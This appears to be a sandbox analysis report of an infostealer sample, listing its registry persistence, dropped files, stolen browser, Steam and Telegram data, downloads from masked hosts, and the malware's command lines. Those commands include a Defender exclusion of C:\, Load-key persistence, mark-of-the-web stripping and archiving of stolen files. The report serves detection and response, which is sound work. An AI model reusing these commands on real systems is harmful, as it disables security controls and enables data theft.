Technical Information (sandbox-observed artifacts: registry and scheduled-task changes, files read/created, network requests, and process command lines; environment-variable placeholders such as %APPDATA% and <SYSTEM32> are normalized, and URLs/hosts are partially masked with #). Points a responder should note from the entries below: persistence is set via the user-level `Load` value under `HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows` and an `HKLM\...\Run` entry; the `TermService` service is set to auto-start with its `ServiceDll` redirected to `%ProgramFiles%\Microsoft DN1\sqlmap.dll` alongside an `rdpwrap.ini` (consistent with an RDP-wrapper style change — verify the DLL); Defender is told to exclude the entire `C:\` drive via `Add-MpPreference -ExclusionPath C:\`; the dropped binaries' `Zone.Identifier` streams are rewritten to `ZoneID = 2`, which removes the mark-of-the-web they would otherwise carry; and collected browser/Steam/Telegram/document files are packed into a 7z archive whose name embeds an IP address, with downloads from an `ngrok.io` host. Treat the duplicated entries as repeated observations, not distinct artifacts.
- [<HKCU>\Software\Microsoft\Windows NT\CurrentVersion\Windows] 'Load' = '%APPDATA%\WinAgent\WinAgent(32).exe.lnk'
- [<HKLM>\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\] 'WinAgent(32)' = '%PROGRAMDATA%\WinAgent(32).exe'
- [<HKCU>\Software\Microsoft\Windows NT\CurrentVersion\Windows] 'Load' = '%APPDATA%\WinDefender(32bit)\WinDefender(32bit).exe.lnk'
- <SYSTEM32>\tasks\s-1-7-14-1367508075-1383877453-1214317971-9143\{6ieac3xi-iq8m-85nc-bcc7-9b5klcc2vkgd}
- [<HKLM>\System\CurrentControlSet\Services\TermService] 'Start' = '00000002'
- [<HKLM>\SYSTEM\CurrentControlSet\Services\TermService\Parameters] 'ServiceDll' = '%ProgramFiles%\Microsoft DN1\sqlmap.dll'
- %WINDIR%\syswow64\cmd.exe
- uen.culae.exe
- <SYSTEM32>\svchost.exe
- %LOCALAPPDATA%\google\chrome\user data\default\web data
- %HOMEPATH%\desktop\508softwareandos.doc
- %HOMEPATH%\desktop\applicantform_en.doc
- %APPDATA%\thunderbird\profiles.ini
- %APPDATA%\mozilla\firefox\profiles.ini
- %APPDATA%\winagent\winagent(32).exe
- %TEMP%\autfc7e.tmp
- %APPDATA%\x86_microsoft-windows-s..interface.resources\spwinsat.sqlite3.module.dll.9
- %APPDATA%\x86_microsoft-windows-s..interface.resources\spwinsat.sqlite3.module.dll
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\screen.jpg
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\desktop txt files\508softwareandos.doc
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\desktop txt files\applicantform_en.doc
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\desktop txt files\glidescope_review_rev_010.docx
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\steam\config\config.vdf
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\steam\инструкция по установке.txt
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\steam\config\dialogconfig.vdf
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\telegram\d877f783d5d3ef8c\map0
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\telegram\инструкция по установке.txt
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\telegram\d877f783d5d3ef8c1
- %APPDATA%\mabkjbc.tmp
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
- %LOCALAPPDATA%\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\information.txt
- %TEMP%\aut3052.tmp
- %APPDATA%\x86_microsoft-windows-s..interface.resources\spwinsat.module.exe.9
- %LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\index.dat
- %APPDATA%\x86_microsoft-windows-s..interface.resources\spwinsat.module.exe
- %APPDATA%\microsoft\windows\cookies\low\index.dat
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\4gws6vc3\desktop.ini
- %APPDATA%\winagent\winagent(32).exe.lnk
- %APPDATA%\tmp.exe
- %TEMP%\.exe
- %PROGRAMDATA%\winagent(32).exe
- %APPDATA%\uen.culae.exe
- %ProgramFiles%\microsoft dn1\sqlmap.dll
- %ProgramFiles%\microsoft dn1\rdpwrap.ini
- <SYSTEM32>\microsoft\protect\s-1-5-20\11e24d86-f9d8-4278-a75c-f57100b5138c
- <SYSTEM32>\microsoft\protect\s-1-5-20\preferred
- %PROGRAMDATA%\microsoft\crypto\rsa\machinekeys\f686aace6942fb7f7ceb231212eef4a4_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
- %APPDATA%\windefender(32bit)\windefender(32bit).exe.lnk
- %APPDATA%\windefender(32bit)\windefender(32bit).exe:zone.identifier
- %TEMP%\svhost.exe
- %APPDATA%\x86_microsoft-windows-s..interface.resources\enu_87fe97a033a147892535
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\history\low\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\index.dat
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\cr83l0gb\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\09p4b19x\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\hmuzijbc\desktop.ini
- %APPDATA%\x86_microsoft-windows-s..interface.resources\[netherlands] 95.211.190.199.7z
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\cr83l0gb\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\09p4b19x\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\4gws6vc3\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\hmuzijbc\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\history\low\desktop.ini
- %TEMP%\autfc7e.tmp
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\telegram\d877f783d5d3ef8c1
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\steam\config\dialogconfig.vdf
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\steam\config\config.vdf
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\steam\инструкция по установке.txt
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\desktop txt files\glidescope_review_rev_010.docx
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\desktop txt files\applicantform_en.doc
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\desktop txt files\508softwareandos.doc
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\screen.jpg
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\information.txt
- %APPDATA%\x86_microsoft-windows-s..interface.resources\spwinsat.module.exe
- %APPDATA%\x86_microsoft-windows-s..interface.resources\spwinsat.module.exe.9
- %TEMP%\aut3052.tmp
- %APPDATA%\mabkjbc.tmp
- %APPDATA%\x86_microsoft-windows-s..interface.resources\spwinsat.sqlite3.module.dll
- %APPDATA%\x86_microsoft-windows-s..interface.resources\spwinsat.sqlite3.module.dll.9
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\telegram\инструкция по установке.txt
- %APPDATA%\x86_microsoft-windows-s..interface.resources\1\telegram\d877f783d5d3ef8c\map0
- from %APPDATA%\tmp.exe to %APPDATA%\x86_microsoft-windows-s..interface.resources\spwinsat.exe
- http://14#.#85.195.20/upnp.exe
- http://a3####53.ngrok.io/BuilMasaD.exe
- DNS ASK a3####53.ngrok.io
- '%APPDATA%\tmp.exe'
- '%PROGRAMDATA%\winagent(32).exe'
- '%APPDATA%\uen.culae.exe'
- '%APPDATA%\x86_microsoft-windows-s..interface.resources\spwinsat.exe'
- '%APPDATA%\x86_microsoft-windows-s..interface.resources\spwinsat.module.exe' a -y -mx9 -ssw "%APPDATA%\x86_microsoft-windows-s..interface.resources\[Netherlands] 95.211.190.199.7z" "%APPDATA%\x86_microsoft-windows-s..interface.resources\1\*"
- '%WINDIR%\syswow64\cmd.exe' /c copy "C:/kruliz/<File name>.exe" "%appdata%\WinAgent\WinAgent(32).exe" /Y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "%appdata%\WinAgent\WinAgent(32).exe.lnk" /f' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo [zoneTransfer]ZoneID = 2 > %appdata%\WinAgent\WinAgent(32).exe:Zone.Identifier' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ren "%appdata%\WinAgent\WinAgent(32).exe.jpg" WinAgent(32).exe' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c copy "C:/Users/user/AppData/Roaming/uEn.CulAE.exe" "%appdata%\WinDefender(32bit)\WinDefender(32bit).exe" /Y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "%appdata%\WinDefender(32bit)\WinDefender(32bit).exe.lnk" /f' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo [zoneTransfer]ZoneID = 2 > %appdata%\WinDefender(32bit)\WinDefender(32bit).exe:Zone.Identifier' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ren "%appdata%\WinDefender(32bit)\WinDefender(32bit).exe.jpg" WinDefender(32bit).exe' (with hidden window)
- '%APPDATA%\x86_microsoft-windows-s..interface.resources\spwinsat.module.exe' a -y -mx9 -ssw "%APPDATA%\x86_microsoft-windows-s..interface.resources\[Netherlands] 95.211.190.199.7z" "%APPDATA%\x86_microsoft-windows-s..interface.resources\1\*"' (with hidden window)
- '%WINDIR%\syswow64\attrib.exe' +s +h "%APPDATA%\x86_microsoft-windows-s..interface.resources"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c copy "C:/kruliz/<File name>.exe" "%appdata%\WinAgent\WinAgent(32).exe" /Y
- '%WINDIR%\syswow64\cmd.exe' /c reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "%appdata%\WinAgent\WinAgent(32).exe.lnk" /f
- '%WINDIR%\syswow64\reg.exe' add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "%APPDATA%\WinAgent\WinAgent(32).exe.lnk" /f
- '%WINDIR%\syswow64\cmd.exe' /c echo [zoneTransfer]ZoneID = 2 > %appdata%\WinAgent\WinAgent(32).exe:Zone.Identifier
- '%WINDIR%\syswow64\cmd.exe' /c ren "%appdata%\WinAgent\WinAgent(32).exe.jpg" WinAgent(32).exe
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\
- '%WINDIR%\syswow64\cmd.exe'
- '%WINDIR%\syswow64\cmd.exe' /c copy "C:/Users/user/AppData/Roaming/uEn.CulAE.exe" "%appdata%\WinDefender(32bit)\WinDefender(32bit).exe" /Y
- '%WINDIR%\syswow64\cmd.exe' /c reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "%appdata%\WinDefender(32bit)\WinDefender(32bit).exe.lnk" /f
- '%WINDIR%\syswow64\reg.exe' add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "%APPDATA%\WinDefender(32bit)\WinDefender(32bit).exe.lnk" /f
- '%WINDIR%\syswow64\cmd.exe' /c echo [zoneTransfer]ZoneID = 2 > %appdata%\WinDefender(32bit)\WinDefender(32bit).exe:Zone.Identifier
- '%WINDIR%\syswow64\cmd.exe' /c ren "%appdata%\WinDefender(32bit)\WinDefender(32bit).exe.jpg" WinDefender(32bit).exe
- '%WINDIR%\syswow64\rundll32.exe' "%WINDIR%\syswow64\WININET.dll",DispatchAPICall 1
- '%WINDIR%\syswow64\attrib.exe' +s +h "%APPDATA%\x86_microsoft-windows-s..interface.resources"